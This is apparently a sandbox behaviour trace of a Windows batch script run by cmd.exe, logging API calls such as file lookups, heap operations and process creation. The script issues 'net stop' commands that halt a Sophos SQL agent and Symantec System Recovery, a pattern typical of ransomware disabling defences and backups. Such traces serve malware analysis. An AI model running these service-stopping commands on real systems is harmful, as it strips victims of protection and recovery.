[0039.671] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0039.671] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0039.671] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0039.671] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0039.671] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0039.671] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0039.671] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0039.671] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0039.671] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0039.671] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0039.671] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0039.671] SetErrorMode (uMode=0x0) returned 0x1 [0039.671] GetProcessHeap () returned 0x3e0000 [0039.671] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0039.671] GetProcessHeap () returned 0x3e0000 [0039.672] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0039.672] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.672] GetProcessHeap () returned 0x3e0000 [0039.672] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0039.672] GetProcessHeap () returned 0x3e0000 [0039.672] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0039.672] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0039.672] GetProcessHeap () returned 0x3e0000 [0039.672] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0039.672] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.672] GetProcessHeap () returned 0x3e0000 [0039.672] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0039.672] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0039.672] GetProcessHeap () returned 0x3e0000 [0039.672] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0039.672] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.672] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.672] GetLastError () returned 0x2 [0039.672] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.672] GetLastError () returned 0x2 [0039.672] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.672] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.673] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.673] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.673] GetLastError () returned 0x2 [0039.673] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.673] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.673] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.673] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0039.673] SetErrorMode (uMode=0x0) returned 0x1 [0039.673] GetProcessHeap () returned 0x3e0000 [0039.673] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0039.673] GetProcessHeap () returned 0x3e0000 [0039.673] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0039.674] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.674] GetProcessHeap () returned 0x3e0000 [0039.674] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0039.674] GetProcessHeap () returned 0x3e0000 [0039.674] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0039.674] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0039.674] GetProcessHeap () returned 0x3e0000 [0039.674] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0039.674] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.674] GetProcessHeap () returned 0x3e0000 [0039.674] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0039.674] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0039.674] GetProcessHeap () returned 0x3e0000 [0039.674] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0039.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.674] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.674] GetLastError () returned 0x2 [0039.674] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.674] GetLastError () returned 0x2 [0039.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.674] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.674] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.675] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.675] GetLastError () returned 0x2 [0039.675] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.675] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.675] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.675] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0039.675] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0039.675] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0039.675] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.675] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SOPHOS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SOPHOS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$SOPHOS /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x5a8, dwThreadId=0x534)) returned 1 [0039.679] CloseHandle (hObject=0x74) returned 1 [0039.679] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.679] GetProcessHeap () returned 0x3e0000 [0039.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.679] GetEnvironmentStringsW () returned 0x3f8408* [0039.679] GetProcessHeap () returned 0x3e0000 [0039.679] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.679] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.679] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0039.866] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0039.866] CloseHandle (hObject=0x78) returned 1 [0039.866] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0039.866] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0039.866] GetProcessHeap () returned 0x3e0000 [0039.866] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.866] GetEnvironmentStringsW () returned 0x3f8408* [0039.866] GetProcessHeap () returned 0x3e0000 [0039.866] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.866] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.866] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.866] GetProcessHeap () returned 0x3e0000 [0039.866] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.866] GetEnvironmentStringsW () returned 0x3f8408* [0039.866] GetProcessHeap () returned 0x3e0000 [0039.866] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.866] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.866] GetProcessHeap () returned 0x3e0000 [0039.866] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0039.866] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0039.866] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.866] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0039.867] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.867] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0039.867] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.867] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0039.867] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.867] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0039.867] SetConsoleInputExeNameW () returned 0x1 [0039.867] GetConsoleOutputCP () returned 0x1b5 [0039.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0039.867] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0039.868] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0039.868] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.868] SetFilePointer (in: hFile=0x78, lDistanceToMove=1410, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x582 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0039.868] GetProcessHeap () returned 0x3e0000 [0039.868] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0039.869] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.869] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x582 [0039.869] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x133f, lpOverlapped=0x0) returned 1 [0039.869] SetFilePointer (in: hFile=0x78, lDistanceToMove=1454, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ae [0039.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=44, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Symantec System RecoveryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 44 [0039.869] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.869] GetFileType (hFile=0x78) returned 0x1 [0039.869] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.869] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ae [0039.869] GetProcessHeap () returned 0x3e0000 [0039.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0039.869] GetProcessHeap () returned 0x3e0000 [0039.869] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0039.870] _tell (_FileHandle=3) returned 1454 [0039.870] _close (_FileHandle=3) returned 0 [0039.870] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0039.870] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0039.870] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0039.870] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0039.870] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0039.870] _wcsicmp (_String1="net", _String2="CD") returned 11 [0039.870] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0039.870] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0039.870] _wcsicmp (_String1="net", _String2="REN") returned -4 [0039.870] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0039.870] _wcsicmp (_String1="net", _String2="SET") returned -5 [0039.870] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0039.870] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0039.870] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0039.870] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0039.870] _wcsicmp (_String1="net", _String2="MD") returned 1 [0039.870] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0039.870] _wcsicmp (_String1="net", _String2="RD") returned -4 [0039.870] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0039.870] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0039.870] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0039.870] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0039.870] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0039.870] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0039.870] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0039.870] _wcsicmp (_String1="net", _String2="VER") returned -8 [0039.870] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0039.870] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0039.871] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0039.871] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0039.871] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0039.871] _wcsicmp (_String1="net", _String2="START") returned -5 [0039.871] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0039.871] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0039.871] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0039.871] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0039.871] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0039.871] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0039.871] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0039.871] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0039.871] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0039.871] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0039.871] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0039.871] SetErrorMode (uMode=0x0) returned 0x1 [0039.871] GetProcessHeap () returned 0x3e0000 [0039.871] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0039.871] GetProcessHeap () returned 0x3e0000 [0039.871] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0039.871] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.871] GetProcessHeap () returned 0x3e0000 [0039.871] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0039.871] GetProcessHeap () returned 0x3e0000 [0039.871] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0039.871] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0039.871] GetProcessHeap () returned 0x3e0000 [0039.871] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0039.871] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.871] GetProcessHeap () returned 0x3e0000 [0039.871] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0039.872] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0039.872] GetProcessHeap () returned 0x3e0000 [0039.872] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0039.872] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.872] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.872] GetLastError () returned 0x2 [0039.872] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.872] GetLastError () returned 0x2 [0039.872] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.872] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.872] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.872] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.872] GetLastError () returned 0x2 [0039.872] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.873] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.873] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.873] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0039.873] SetErrorMode (uMode=0x0) returned 0x1 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0039.873] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0039.873] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0039.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0039.873] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0039.873] GetProcessHeap () returned 0x3e0000 [0039.873] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0039.873] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.873] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.874] GetLastError () returned 0x2 [0039.874] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.874] GetLastError () returned 0x2 [0039.874] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 